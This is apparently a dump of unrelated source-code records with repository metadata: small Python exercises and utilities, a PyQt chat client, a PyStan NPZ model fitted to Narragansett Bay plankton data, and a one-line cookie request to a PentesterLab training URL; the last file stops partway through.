"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"send_metrics": "",
"init_version": "1.0.0",
"node_options": "",
"umask": "0022",
"scope": "",
"git": "git",
"init_author_name": "",
"onload_script": "",
"tmp": "/var/folders/pb/2r7f4bq147bgw8b7s_x_s3900000gn/T",
"unsafe_perm": "true",
"prefix": "/usr/local",
"link": ""
}
}
|
[
"dllido@MacBook-Pro-de-Dolores.local"
] |
dllido@MacBook-Pro-de-Dolores.local
|
faf55dcced2172399d37e25d66e39d89868333d0
|
280049c5d363df840e5a2184002e59625f0af61b
|
/datastructure11-balancedparanthesischeck.py
|
26c752c9dfffff64c23a2cf8d5095ae37812d617
|
[] |
no_license
|
deesaw/DataSPython
|
853c1b36f7185752613d6038e706b06fbf25c84e
|
c69a23dff3b3852310f145d1051f2ad1dda6b7b5
|
refs/heads/main
| 2023-02-19T13:36:01.547293
| 2021-01-16T13:15:56
| 2021-01-16T13:15:56
| 330,166,053
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,346
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 6 12:17:58 2021
@author: deesaw
"""
def balance_check(s):
# Check is even number of brackets
if len(s)%2 != 0:
return False
# Set of opening brackets
opening = set('([{')
# Matching Pairs
matches = set([ ('(',')'), ('[',']'), ('{','}') ])
# Use a list as a "Stack"
stack = []
# Check every parenthesis in string
for paren in s:
# If its an opening, append it to list
if paren in opening:
stack.append(paren)
else:
# Check that there are parentheses in Stack
if len(stack) == 0:
return False
# Check the last open parenthesis
last_open = stack.pop()
# Check if it has a closing match
if (last_open,paren) not in matches:
return False
return len(stack) == 0
from nose.tools import assert_equal
class TestBalanceCheck(object):
def test(self,sol):
assert_equal(sol('[](){([[[]]])}('),False)
assert_equal(sol('[{{{(())}}}]((()))'),True)
assert_equal(sol('[[[]])]'),False)
print('ALL TEST CASES PASSED')
# Run Tests
t = TestBalanceCheck()
t.test(balance_check)
|
[
"69420960+deesaw@users.noreply.github.com"
] |
69420960+deesaw@users.noreply.github.com
|
61c547985ebd1624cef39b0279164ca64369bd8b
|
54a2ac1972aa12e97e1029dddac6908a0e457d1c
|
/ej22.py
|
d564606a9f466aa3698b9b3467e6bba2ad18706d
|
[] |
no_license
|
bthecs/computacion-2
|
2e7b557ab365e74634772f58067b2bbe0ea5d1d3
|
69d54714da8f40fbef9a6635b4fe6b1b1638a11e
|
refs/heads/master
| 2023-03-18T22:38:21.953987
| 2019-12-11T15:42:25
| 2019-12-11T15:42:25
| 343,834,502
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 647
|
py
|
from multiprocessing import Queue, Lock
import threading
import time
import os
def thread_function(x,l,q):
l.acquire()
time.sleep(1)
q.put("mi PID es: %d,Nombre: %s, Thread %d,Proceso: %d"%(os.getpid(),threading.current_thread().getName(),threading.get_ident(),x))
l.release()
def mostrarCola(q):
while True:
print(q.get())
if q.empty():
break
if __name__ == "__main__":
q = Queue()
l = Lock()
pid=os.getpid()
for x in range(3):
p1 = threading.Thread(target=thread_function, args=(x,l,q))
p1.start()
time.sleep(1)
p1.join()
mostrarCola(q)
|
[
"fl.gimenez@alumno.um.edu.ar"
] |
fl.gimenez@alumno.um.edu.ar
|
22aa2617e351bbbaf035cb3b8ac08016c4632660
|
41278a3ab6c8b8f280e785b79c15377a2de56a2d
|
/guardian.py
|
680dbcc6516d80fb29ac29c6bda4d43391c6e140
|
[] |
no_license
|
mayanand/restClient
|
1f0c70aad91d15c1a8d7f53bdc5c5c89ab6e5db8
|
927cffc1f2374760633da4bf6555801a80983469
|
refs/heads/master
| 2021-03-08T19:25:38.925946
| 2016-04-14T00:04:46
| 2016-04-14T00:04:46
| 56,193,486
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 721
|
py
|
#!/usr/bin/env python
from restapi import restAPI
from image import imageDownloader
class guardianRestAPI(restAPI):
def __init__(self):
restAPI.__init__(self)
self.RESTendpoint = "http://content.guardianapis.com/search?q=%s&api-key=%s"
self.apiKey = 'test'
def parseGuradianJSON(self, topic):
result = self.connect_api(topic)
imageDownloader_obj = imageDownloader()
for element in result['response']['results']:
imageDownloader_obj.get_images(element['webUrl'])
#pprint.pprint(result)
if __name__ == '__main__':
g_obj = guardianRestAPI()
g_obj.parseGuradianJSON('obama')
|
[
"Mayank Anand"
] |
Mayank Anand
|
fc140be5ed838830be722cb050742cde1b3cb053
|
87455bab2ddf7c9312453ca74689b133f3d6745d
|
/case_studies/npz/scripts/npz_narragansett_py.py
|
879eba3573907047de566834166742228e1a45bb
|
[] |
no_license
|
maxEntropyProd/bayesian_cbiomes
|
dd87d7f88e127e5f0699d15ae0ec3f2380b9ba89
|
c3a2f2e60f2271a0a4843e9db6be2111b765efa1
|
refs/heads/master
| 2020-12-06T06:30:34.433777
| 2020-01-10T14:06:20
| 2020-01-10T14:06:20
| 232,373,541
| 0
| 0
| null | 2020-01-07T17:01:40
| 2020-01-07T17:01:39
| null |
UTF-8
|
Python
| false
| false
| 14,243
|
py
|
#!/usr/bin/env python
# coding: utf-8
# # Confront the NPZ model with real data from Narragansett Bay
#
# ## 1. A first look at the data
# In[1]:
import numpy as np
# load data from CSV file
datafile = 'data/data_npz_narragansett.csv'
data = np.loadtxt(datafile, skiprows=1, delimiter=',')
with open(datafile) as f:
data_names = f.readline().strip().split(',')
print(data_names)
# In[14]:
import matplotlib.pyplot as plt
fig, axs = plt.subplots(nrows=4, sharex=True, sharey=True, figsize=(12,12))
for iax,ax in enumerate(axs.flat[:-1]):
ax.plot(data[:,0], data[:,iax+1])
ax.set_ylabel(data_names[iax+1])
ax.grid(True)
axs[0].set_title('Narragansett Bay NPZ data')
axs[0].axhline(0.25, color='darkred')
axs[-1].plot(data[:,0], np.sum(data[:,1:],axis=1))
axs[-1].set(xlabel=data_names[0], ylabel='sum', xticks=np.arange(0.0,data[-1,0],365.0))
axs[-1].grid(True)
# ### challenges for fitting data:
# * high noise level
# * no conservation of mass while NPZ model conserves mass
# ## 2. Modifications to the NPZ model
#
# allow influx and loss of N in the model:
# * introduce a background concentration for each variable and allow mixing with that background concentration
# * have a winter period for each year with stronger mixing and different background concentrations
# * estimate start and duration of winter period for each year (initial guess is based on data)
# * estimate background concentrations for winter and regular period (same for each year)
#
#
# In[3]:
# base initial guess of start and duration of the winter period based on N crossing a 0.25 threshold
stan_code_dataparams = '''data {
int<lower=0> nobs; // number of timesteps with observations
real<lower=0> tobs[nobs]; // obs times
int<lower=0> nobsvar; // number of observed variables
int<lower=0> iobsvar[nobsvar]; // index of observed variable (N=1, P=2, Z=3)
real<lower=0> obs[nobs,nobsvar]; // observed variable at measurement times
int<lower=0> nyears; // number of years (number of winters to add to the model)
}
transformed data {
real wintermixstart_guess[nyears];
real wintermixduration_guess[nyears];
{
int start = 0;
int iyear = 1;
real thresh = 0.25;
for (it in 1:nobs){
if (start == 0 && obs[it,1] >= thresh){
start = 1;
wintermixstart_guess[iyear] = tobs[it];
} else if (start == 1 && obs[it,1] < thresh && obs[it+1,1] < thresh){
start = 0;
wintermixduration_guess[iyear] = tobs[it] - wintermixstart_guess[iyear];
wintermixstart_guess[iyear] -= 365.0*(iyear-1);
iyear += 1;
if (iyear > nyears){
break;
}
}
}
}
// will be printed once by every chain
print("wintermixstart_guess = ",wintermixstart_guess);
print("wintermixduration_guess = ",wintermixduration_guess);
}
parameters {
real<lower=0> vmax; // maximum growth rate in Michaelis Menten formulation
real<lower=0> nuthalfsat; // nutrient half saturation in Michaelis Menten formulation
real<lower=0> graz; // zooplankton grazing rate
real<lower=0> mort_p; // phytoplankton mortality rate
real<lower=0> mort_z; // zooplankton mortality rate
real<lower=0> bgconc_n1; // N background concentration regular
real<lower=0> bgconc_n2; // N background concentration winter
real<lower=0> bgconc_p1; // P background concentration regular
real<lower=0> bgconc_p2; // P background concentration winter
real<lower=0> bgconc_z1; // Z background concentration regular
real<lower=0> bgconc_z2; // Z background concentration winter
real<lower=0> mix1; // mixing strength regular
real<lower=0> mix2; // mixing strength winter
real<lower=-100.0,upper=200.0> wintermixstart[nyears]; // start of winter mixing, restricted to broad winter period
real<lower=0> wintermixduration[nyears]; // duration of winter mixing
real<lower=1E-15> sigma[nobsvar]; // observation error standard deviations
real<lower=0> x0[3]; // initial conditions
}
transformed parameters {
real theta[13+2*nyears];
real x[nobs,3];
theta[1] = vmax;
theta[2] = nuthalfsat;
theta[3] = graz;
theta[4] = mort_p;
theta[5] = mort_z;
theta[6] = bgconc_n1;
theta[7] = bgconc_n2;
theta[8] = bgconc_p1;
theta[9] = bgconc_p2;
theta[10] = bgconc_z1;
theta[11] = bgconc_z2;
theta[12] = mix1;
theta[13] = mix2;
for (iyear in 1:nyears){
theta[13+2*iyear-1] = wintermixstart[iyear] + (iyear-1)*365.0;
theta[13+2*iyear] = theta[13+2*iyear-1] + wintermixduration[iyear];
}
x = integrate_ode_rk45(npz, x0, -1, tobs, theta,
rep_array(0.0, 0), rep_array(0, 0),
1e-5, 1e-4, 2e3*nyears);
}
'''
# In[4]:
# for now, do not fit data
stan_code_model_nofit = '''model {
x0[1] ~ normal(0.3, 0.1); // prior on N initial conditions
x0[2] ~ normal(0.1, 0.1); // prior on P initial conditions
x0[3] ~ normal(0.1, 0.1); // prior on Z initial conditions
sigma ~ exponential(1.0);
// priors for parameters
vmax ~ normal(0.15, 0.03);
nuthalfsat ~ normal(0.17, 0.04);
graz ~ normal(0.15, 0.04);
mort_p ~ normal(0.02, 0.01);
mort_z ~ normal(0.02, 0.005);
bgconc_n1 ~ normal(0.01, 0.001); // (regular)
bgconc_n2 ~ normal(0.66, 0.08); // (winter)
bgconc_p1 ~ normal(0.11, 0.01); // (regular)
bgconc_p2 ~ normal(0.05, 0.005); // (winter)
bgconc_z1 ~ normal(0.09, 0.01); // (regular)
bgconc_z2 ~ normal(0.05, 0.03); // (winter)
mix1 ~ normal(0.01, 0.03); // (regular)
mix2 ~ normal(0.19, 0.02); // (winter)
for (iyear in 1:nyears){
wintermixstart[iyear] ~ normal(wintermixstart_guess[iyear], 10.0);
wintermixduration[iyear] ~ normal(wintermixduration_guess[iyear], 10.0);
}
// no fitting of data yet
}
'''
# In[5]:
# mixing/exchange with background concentrations is implemented using a nudging/relaxation term
stan_code_functions = '''functions {
real[] npz(real t, // time
real[] x, // state
real[] theta, // parameters
real[] x_r, // real-valued input data (empty)
int[] x_i) { // integer-valued input data (empty)
/*
guide to theta:
theta[1]: vmax maximum growth rate in Michaelis Menten formulation
theta[2]: nuthalfsat nutrient half saturation in Michaelis Menten formulation
theta[3]: graz zooplankton grazing rate
theta[4]: mort_p phytoplankton mortality rate
theta[5]: mort_z zooplankton mortality rate
theta[6]: bgconc_n1 N background concentration regular
theta[7]: bgconc_n2 N background concentration winter
theta[8]: bgconc_p1 P background concentration regular
theta[9]: bgconc_p2 P background concentration winter
theta[10]: bgconc_z1 Z background concentration regular
theta[11]: bgconc_z2 Z background concentration winter
theta[12]: mix1 mixing strength regular
theta[13]: mix2 mixing strength winter
theta[14]: start time of first winter
theta[15]: stop time of first winter
theta[16]: start time of second winter
theta[17]: stop time of second winter
... number of winters is set to nyears
*/
real n = fmax(0.0, x[1]);
real p = fmax(0.0, x[2]);
real z = fmax(0.0, x[3]);
real growth = theta[1]*n/(theta[2]+n) * p; // nutrient-dependent growth
real grazing = theta[3]*p*z; // grazing
real ploss = theta[4]*p; // linear phytoplankton mortality
real zloss = theta[5]*z*z; // quadratic zooplankton mortality
// N,P,Z gain or loss terms due to mixing/exchange with background
real exch_n;
real exch_p;
real exch_z;
int i = 14;
while (i <= size(theta) && t>=theta[i]){
i += 1;
}
if ((i-13)%2 == 1){
// regular (non-winter) time
exch_n = theta[12]*(theta[6]-n);
exch_p = theta[12]*(theta[8]-p);
exch_z = theta[12]*(theta[10]-z);
} else {
// winter time
exch_n = theta[13]*(theta[7]-n);
exch_p = theta[13]*(theta[9]-p);
exch_z = theta[13]*(theta[11]-z);
}
return {-growth+ploss+zloss+exch_n,growth-grazing-ploss+exch_p,grazing-zloss+exch_z};
}
}
'''
# ## 3. Sampling from the prior
#
# Because we are not yet fitting data in the model, the Stan output are samples from the prior model solution.
# In[6]:
import pystan
# stitch together the code and compile it
stan_code = stan_code_functions + stan_code_dataparams + stan_code_model_nofit
model = pystan.StanModel(model_code=stan_code, model_name='NPZ')
# In[7]:
# reduce the dataset (to decrease runtime)
nyears = 2
index = data[:,0] <= nyears * 365
stan_data = {
'nobs':sum(index),
'tobs':data[index,0],
'nobsvar':3,
'iobsvar':(1,2,3), # all variables are observed
'obs':data[index,1:],
'nyears':nyears,
}
# In[8]:
# run the model, note low number of iterations/length of chain
mcmc = model.sampling(data=stan_data, iter=1000)
print(mcmc)
# In[9]:
# plot 100 randomly chosen prior solutions
index_prior = np.random.choice(mcmc['x'].shape[0], 100, replace=False)
t = data[index,0]
fig, axs = plt.subplots(nrows=4, sharex=True, sharey=True, figsize=(12,12))
for iax,ax in enumerate(axs.flat[:-1]):
ax.plot(t, data[index,iax+1])
ax.plot(t, mcmc['x'][index_prior,:,iax].T, color='k', alpha=0.1)
ax.set_ylabel(data_names[iax+1])
ax.grid(True)
axs[0].set_title('Narragansett Bay NPZ data and samples from the model prior')
axs[-1].plot(t, np.sum(data[index,1:],axis=1))
axs[-1].plot(t, np.sum(mcmc['x'][index_prior,:,:],axis=2).T, color='k', alpha=0.1)
axs[-1].set(xlabel=data_names[0], ylabel='sum', xticks=np.arange(0.0,nyears*365.0,365.0))
axs[-1].grid(True)
None
# ## 4. Reparameterizing the model and fitting data
#
# Normally we would use a statement like
# ```
# for(i in 1:nobsvar){
# for (iobs in 1:nobs){
# obs[iobs,i] ~ normal(x[iobs,iobsvar[i]], sigma[i]);
# }
# }
# ```
# in Stan's model block to fit the data. When formulated this way, Stan can have trouble sampling from the posterior distribution, for example when `sigma[i]` changes greatly for different values of `x[iobs,iobsvar[i]]`.
#
# Here it helps *a lot* (decrease in runtime by 1-2 orders of magnitude) to reparameterize the model:
# ```
# for(i in 1:nobsvar){
# for (iobs in 1:nobs){
# obs_normalized = (obs[iobs,i]-x[iobs,iobsvar[i]])/sigma[i];
# obs_normalized ~ std_normal();
# }
# }
# ```
#
# For more information, see the corresponding section in the [Stan user guide](https://mc-stan.org/docs/stan-users-guide/reparameterization-section.html).
# In[10]:
# reparameterized model block
stan_code_model = '''model {
real obs_normalized;
x0[1] ~ normal(0.3, 0.1); // prior on N initial conditions
x0[2] ~ normal(0.1, 0.1); // prior on P initial conditions
x0[3] ~ normal(0.1, 0.1); // prior on Z initial conditions
sigma ~ exponential(1.0);
// priors for parameters
vmax ~ normal(0.15, 0.03);
nuthalfsat ~ normal(0.17, 0.04);
graz ~ normal(0.15, 0.04);
mort_p ~ normal(0.02, 0.01);
mort_z ~ normal(0.02, 0.005);
bgconc_n1 ~ normal(0.01, 0.001); // (regular)
bgconc_n2 ~ normal(0.66, 0.08); // (winter)
bgconc_p1 ~ normal(0.11, 0.01); // (regular)
bgconc_p2 ~ normal(0.05, 0.005); // (winter)
bgconc_z1 ~ normal(0.09, 0.01); // (regular)
bgconc_z2 ~ normal(0.05, 0.03); // (winter)
mix1 ~ normal(0.01, 0.03); // (regular)
mix2 ~ normal(0.19, 0.02); // (winter)
for (iyear in 1:nyears){
wintermixstart[iyear] ~ normal(wintermixstart_guess[iyear], 10.0);
wintermixduration[iyear] ~ normal(wintermixduration_guess[iyear], 10.0);
}
// fitting the observations
for(i in 1:nobsvar){
for (iobs in 1:nobs){
obs_normalized = (obs[iobs,i]-x[iobs,iobsvar[i]])/sigma[i];
obs_normalized ~ std_normal();
}
}
}
'''
# In[11]:
# stitch together the updated code and compile it
stan_code = stan_code_functions + stan_code_dataparams + stan_code_model
model = pystan.StanModel(model_code=stan_code, model_name='NPZ')
# In[12]:
mcmc = model.sampling(data=stan_data, iter=2000)
print(mcmc)
# In[13]:
q = (5,25,50,75,95)
x_perc = np.percentile(mcmc['x'], q, axis=0)
fig, axs = plt.subplots(nrows=4, sharex=True, sharey=True, figsize=(12,12))
for iax,ax in enumerate(axs.flat[:-1]):
ax.plot(t, data[index,iax+1])
ax.fill_between(t, x_perc[0,:,iax], x_perc[-1,:,iax], alpha=0.2, color='C1')
ax.fill_between(t, x_perc[1,:,iax], x_perc[-2,:,iax], alpha=0.5, color='C1')
ax.plot(t, x_perc[2,:,iax], label='model', color='C1')
ax.set_ylabel(data_names[iax+1])
ax.grid(True)
axs[0].set_title('Narragansett Bay NPZ data and model posterior quantiles')
ax = axs[-1]
ax.plot(t, np.sum(data[index,1:],axis=1))
ax.fill_between(t, np.sum(x_perc[0,:,:],axis=1), np.sum(x_perc[-1,:,:],axis=1), alpha=0.2, color='C1')
ax.fill_between(t, np.sum(x_perc[1,:,:],axis=1), np.sum(x_perc[-2,:,:],axis=1), alpha=0.5, color='C1')
ax.plot(t, np.sum(x_perc[2,:,:],axis=1), label='model', color='C1')
ax.set(xlabel=data_names[0], ylabel='sum', xticks=np.arange(0.0,nyears*365.0,365.0))
ax.grid(True)
|
[
"gregleebritten@gmail.com"
] |
gregleebritten@gmail.com
|
b8fac3e471ae450389961aa1cb49b4834ce1d6cb
|
5b565e331073a8b29f997c30b58d383806f7d5a8
|
/pizzeria/11_env/bin/easy_install-3.7
|
242566d7d779997c369a8ea2a01c7db939a5250b
|
[] |
no_license
|
jeongwook/python_work
|
f403d5be9da6744e49dd7aedeb666a64047b248d
|
bba188f47e464060d5c3cd1f245d367da37827ec
|
refs/heads/master
| 2022-04-02T23:16:57.597664
| 2020-01-21T08:29:48
| 2020-01-21T08:29:48
| 227,506,961
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 288
|
7
|
#!/Users/jeongwook/Desktop/python/python_work/pizzeria/11_env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"jeongwook.yu@utexas.edu"
] |
jeongwook.yu@utexas.edu
|
18b12259ea05cacdcb9d10fcdd104daa667751b6
|
4b59ace76840cbeb28f0fac19f128cd3959a7c3a
|
/catalog/api/v1/utility.py
|
4b15a94bb676733ffce5e82f091fc6cde3d1ce2c
|
[] |
no_license
|
JoshuadeJong/ecommerce-microservice
|
2a8f4d2f091c459dc9bcb47c01904f21c478cf91
|
246c6d0eb014df2946874cafcddebea1e0eaa97d
|
refs/heads/master
| 2023-03-25T23:57:15.369285
| 2021-03-19T15:47:32
| 2021-03-19T15:47:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 204
|
py
|
def item2dict(item_id, item) -> dict:
return {
"id": item_id,
"name": item.name,
"description": item.description,
"price": item.price,
"stock": item.stock
}
|
[
"joshuakdejong@gmail.com"
] |
joshuakdejong@gmail.com
|
3ae6423a2a19cb9678453bb48e72fd82b6afb002
|
36a92a0af4e4fa2b8191ddb8b0f0b8ed15c2baca
|
/send-cookies.py
|
999fd98911a1e0cbd4ef3f5f1e1606a3e11aad21
|
[] |
no_license
|
p4r7h/Python-script
|
043d6b70387f1834fac147e0ee88cfbb416ea205
|
45e0c39849c0a885b26db433cdfa94f885e1988b
|
refs/heads/main
| 2023-06-12T03:09:26.333375
| 2021-06-21T01:23:08
| 2021-06-21T01:23:08
| 344,584,712
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 141
|
py
|
import requests
url = 'http://ptl-e1cf1322-eb626166.libcurl.so/pentesterlab'
x = requests.get(url, cookies = {'key': 'please'})
print(x.text)
|
[
"noreply@github.com"
] |
p4r7h.noreply@github.com
|
4069b0b957b7c70d0f9663a86dd1cecb18c73276
|
1069b21592cd0771d69618d292e0511ec98251d9
|
/visual_client10_9.py
|
09d08582ba82f4698edc446c1688a703a3d9fcb8
|
[] |
no_license
|
12Dong/python-socket
|
6936fb6d7984c5948b31ce70837fab3437420b82
|
cdb754a104eb5a0ccdb260eea83a943ce67bf268
|
refs/heads/master
| 2021-08-24T14:06:05.261228
| 2017-12-10T04:42:05
| 2017-12-10T04:42:05
| 113,722,198
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,415
|
py
|
# coding:utf-8
import socket
import threading
import sys
from PyQt5.QtWidgets import QWidget,QApplication,QGridLayout,QLineEdit,QTextEdit,QLabel,QPushButton,QFrame
from PyQt5 import QtCore,QtWidgets
from PyQt5 import QtGui
from PyQt5.QtGui import*
from PyQt5.QtGui import QIcon
host = 'localhost'
port = 9999
username = '12Dong'
class Log(QFrame):
def __init__(self,s):
super().__init__()
self.initUI()
self.s=s
def initUI(self):
self.setObjectName('main')
self.Str = QLabel("Welcome to my chat room.Please input your nickname")
self.Nickname = QLabel('Nickname : ')
self.text = QLineEdit()
self.btnStart = QPushButton("Start!")
grid = QGridLayout()
grid.setSpacing(10)
grid.addWidget(self.Str,2,2,2,5)
grid.addWidget(self.Nickname,3,1,3,1)
grid.addWidget(self.text,3,2,3,4)
grid.addWidget(self.btnStart,3,6,3,6)
self.setLayout(grid)
self.creationAction()
self.setWindowTitle('Title')
self.setGeometry(500, 500, 500, 300)
with open('logbg.qss', 'r') as p:
self.setStyleSheet(p.read())
self.show()
def setNickname(self):
name = str(self.text.text())
self.text.setText('')
s.send(name.encode('utf-8'))
c = Client(name)
c.show()
self.close()
def creationAction(self):
self.btnStart.clicked.connect(self.setNickname)
class Client(QFrame):
def __init__(self, name):
super().__init__()
self.Nickname = name
self.initUI()
def initUI(self):
self.setWindowTitle('Client')
self.setNameWidget = QWidget()#
self.layout = QGridLayout(self)#
self.setNameLayout = QGridLayout(self.setNameWidget)#
self.btnSend = QPushButton('send')#
self.input = QLineEdit()#
self.chat = QTextEdit()#
self.timer = QtCore.QTimer()
self.messages = []
self.build()
self.createAction()
self.setWindowIcon(QIcon("mylove.ico"))
self.Sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
recvThread = threading.Thread(target=self.recvFromServer) #
recvThread.start()#
self.setGeometry(500,500,600,400)
self.setWindowTitle('Communcation')
with open('texteditbg.qss', 'r') as q:
self.setStyleSheet(q.read())
def sendToServer(self): #
global username
text = str(self.input.text())
self.input.setText('')
if text == 'Exit' or text=='':
self.exit()
try:
s.send(text.encode('utf-8'))
print('%s >> %s' % (username, text))
self.messages.append(self.Nickname+" : " + text )
except ConnectionAbortedError:
print('Server closed this connection!')
self.exit()
except ConnectionResetError:
print('Server is closed!')
self.exit()
def recvFromServer(self): #
while 1:
try:
data = s.recv(1024).decode('utf-8')
if not data:
exit()
print(data)
self.messages.append(data)
except ConnectionAbortedError:
print('Server closed this connection!')
self.exit()
except ConnectionResetError:
print('Server is closed!')
self.exit()
def showChat(self): #
for m in self.messages:
self.chat.append(m)
self.messages = []
def exit(self): #
s.close()
sys.exit()
def build(self):
self.layout.addWidget(self.chat, 0, 0, 5, 4)
self.layout.addWidget(self.input, 5, 0, 1, 3)
self.layout.addWidget(self.btnSend, 5, 3)
self.setLayout(self.layout)
def createAction(self):
self.btnSend.clicked.connect(self.sendToServer)
self.timer.timeout.connect(self.showChat)
self.timer.start(1000)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
address = ('127.0.0.1', 31500)
Sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
Sock.sendto(b'1',address)
print(s.recv(1024).decode())
app = QApplication(sys.argv)
log = Log(s)
app.exec_()
#10/4 implemented socket communication
#10/6 wrapped the UI with PyQt5 and polished the interface
#10/9 implemented UDP communication
#made by 12Dong
|
[
"289663639@qq.com"
] |
289663639@qq.com
|
82355523e5e347b9831a1ae711165e2ece5d664f
|
4aae80d02949928e859ea9536051f59ed14ec918
|
/apartment/house_summary.py
|
12793965147a94786cc6eaa2e1738a092d991116
|
[] |
no_license
|
xli1234/PythonProject
|
a6c5c61b8fb86d8b9b7dc2d39d3784db3184a46b
|
e2555e8befd086ac98881a91630b1260cf6709f0
|
refs/heads/master
| 2020-07-31T05:46:11.688485
| 2019-10-08T02:04:42
| 2019-10-08T02:04:42
| 210,504,536
| 4
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 535
|
py
|
import pandas as pd
def summary_house():
df = pd.read_csv('apartment/house_cache.csv')
zip_area = {15213: 'Oakland', 15217: 'Squirrel Hill', 15232: 'Shadyside'}
house_count = list(df[['Zip', 'Street']].groupby('Zip').count().values.reshape(3))
house_area = list(df[['Zip', 'Street']].groupby('Zip').count().index)
print('All three areas'.rjust(20), str(sum(house_count)).rjust(5), 'houses/apartments')
for i in range(len(house_area)):
print(zip_area[house_area[i]].rjust(20), str(house_count[i]).rjust(5), 'houses/apartments')
|
[
"34395567+shenshopping@users.noreply.github.com"
] |
34395567+shenshopping@users.noreply.github.com
|
09b1947d280f745d62a37740eb2545109fa7aba2
|
9ee0f0850d8743d08a2ecdf16e0e79ad58615908
|
/Arrendador/serializers.py
|
cabceb1ac480eb63740d2b5e64a3c8ee0f187ca9
|
[] |
no_license
|
alexgrajales/plataforma-web-de-gesti-n-de-inmuebles-para-arrendatarios-independientes.
|
20fb4ebb60940cd9fa40010515e8116cb4418d39
|
ce335f05ff6f217a5c3b94022b51bf37b46adf5c
|
refs/heads/master
| 2022-11-04T08:01:14.427926
| 2017-12-01T22:16:56
| 2017-12-01T22:16:56
| 110,597,537
| 0
| 1
| null | 2022-10-05T04:58:51
| 2017-11-13T20:20:53
|
Python
|
UTF-8
|
Python
| false
| false
| 271
|
py
|
from rest_framework import serializers
from rest_framework_mongoengine import serializers as mongoserializers
from Arrendador.models import Arrendador
class ArrendadorSerializer(mongoserializers.DocumentSerializer):
class Meta:
model = Arrendador
fields = '__all__'
|
[
"alex-12-04@hotmail.com"
] |
alex-12-04@hotmail.com
|
aab5b930200d680d23a2dbddf6c89da66a40ebc7
|
9460ee7136f277825b09e5f63675364461deacea
|
/GATE_Engine/libs/par/test/hierarchy.py
|
2f4e7fa88ecb974f8c8b074c616372ebccf3eb99
|
[
"MIT"
] |
permissive
|
DocDonkeys/GATE_Engine
|
9c4a5376e10e20774c20ec3f069b973e754cb058
|
bb2868884c6eec0ef619a45b7e21f5cf3857fe1b
|
refs/heads/master
| 2020-07-27T09:18:46.947405
| 2019-12-30T16:16:11
| 2019-12-30T16:16:11
| 209,041,360
| 1
| 3
|
MIT
| 2020-02-19T16:32:08
| 2019-09-17T11:58:13
|
C++
|
UTF-8
|
Python
| false
| false
| 442
|
py
|
import json
flare = json.load(open('flare.json'))
print flare
things = []
def traverse(node, parent):
me = len(things)
print '{:3} {}'.format(me, node['name'])
things.append(parent)
children = node.get('children', [])
for child in children:
traverse(child, me)
traverse(flare, 0)
for i in xrange(len(things)):
print '{:3},'.format(things[i]),
if (i + 1) % 12 == 0: print;
print '---\n', len(things)
|
[
"36265669+DidacRomero@users.noreply.github.com"
] |
36265669+DidacRomero@users.noreply.github.com
|
36719882d3b660fcaa5d889e59fee49bb5b86525
|
a6ae6b2bb64b622338fc001b30a9f053717cc770
|
/toVOC/evaluation/evalute.py
|
ae710a548491b2f324491b17a26f860d2fca267c
|
[] |
no_license
|
tianws/script
|
1bec9f549fd801b5848f33f243d32db5bdd61722
|
3ecf2bca42e8c6c7f6a964ddc42acc3e483387fc
|
refs/heads/master
| 2021-06-04T11:53:32.337079
| 2021-01-12T08:20:13
| 2021-01-12T08:20:13
| 98,512,027
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,534
|
py
|
#!/usr/bin/env python
# coding=utf-8
from __future__ import division, unicode_literals
import argparse
import logging
import phodopus
import squirrel
import sys
if sys.version_info.major == 2:
from pathlib2 import Path
else:
from pathlib import Path
if __name__ == '__main__':
logging.basicConfig(
format='%(levelname)s:%(message)s', level=logging.INFO)
parser = argparse.ArgumentParser(
        description='Evaluate vehicle-rear or lane detection by comparing the existing detection output file (log) against the annotation file (txt)')
parser.add_argument('log_pathname', action='store', type=Path)
parser.add_argument('label_pathname', action='store', type=Path)
group = parser.add_mutually_exclusive_group()
group.add_argument(
'-s', action='store_const', dest='module',
const=squirrel, help='squirrel')
group.add_argument(
'-p', action='store_const', dest='module',
const=phodopus, help='phodopus')
args = parser.parse_args(sys.argv[1:])
if args.module is None:
logging.error('You should choose -s or -p! See -h')
tp_count, fp_count, fn_count = args.module.parse(
args.log_pathname,
args.label_pathname)
precision, recall, fb_measure, _ = args.module.statistics(
tp_count,
fp_count,
fn_count)
logging.info('precision: {:.3}'.format(precision))
logging.info('recall: {:.3}'.format(recall))
logging.info('fb_measure: {:.3}'.format(fb_measure))
|
[
"tianws@mapbar.com"
] |
tianws@mapbar.com
|
f794cd1dae5cb4ed8da0fc22286c5a047b86c2fa
|
d8a541a2953c9729311059585bb0fca9003bd6ef
|
/Lists as stack ques/cups_and_bottles.py
|
efc8af013cd606d663a6539b7b98d2807e6c28fc
|
[] |
no_license
|
grigor-stoyanov/PythonAdvanced
|
ef7d628d2b81ff683ed8dd47ee307c41b2276dd4
|
0a6bccc7faf1acaa01979d1e23cfee8ec29745b2
|
refs/heads/main
| 2023-06-10T09:58:04.790197
| 2021-07-03T02:52:20
| 2021-07-03T02:52:20
| 332,509,767
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 604
|
py
|
from collections import deque
cups = deque(map(int, input().split()))
bottles = list(map(int, input().split()))
wasted_water = 0
while cups and bottles:
current_cup = cups.popleft()
while current_cup > 0 and bottles:
current_bottle = bottles.pop()
current_cup -= current_bottle
if current_cup < 0:
wasted_water += -current_cup
if not cups:
print('Bottles: ', end='')
print(*[bottles.pop() for i in range(len(bottles))])
else:
print('Cups: ', end='')
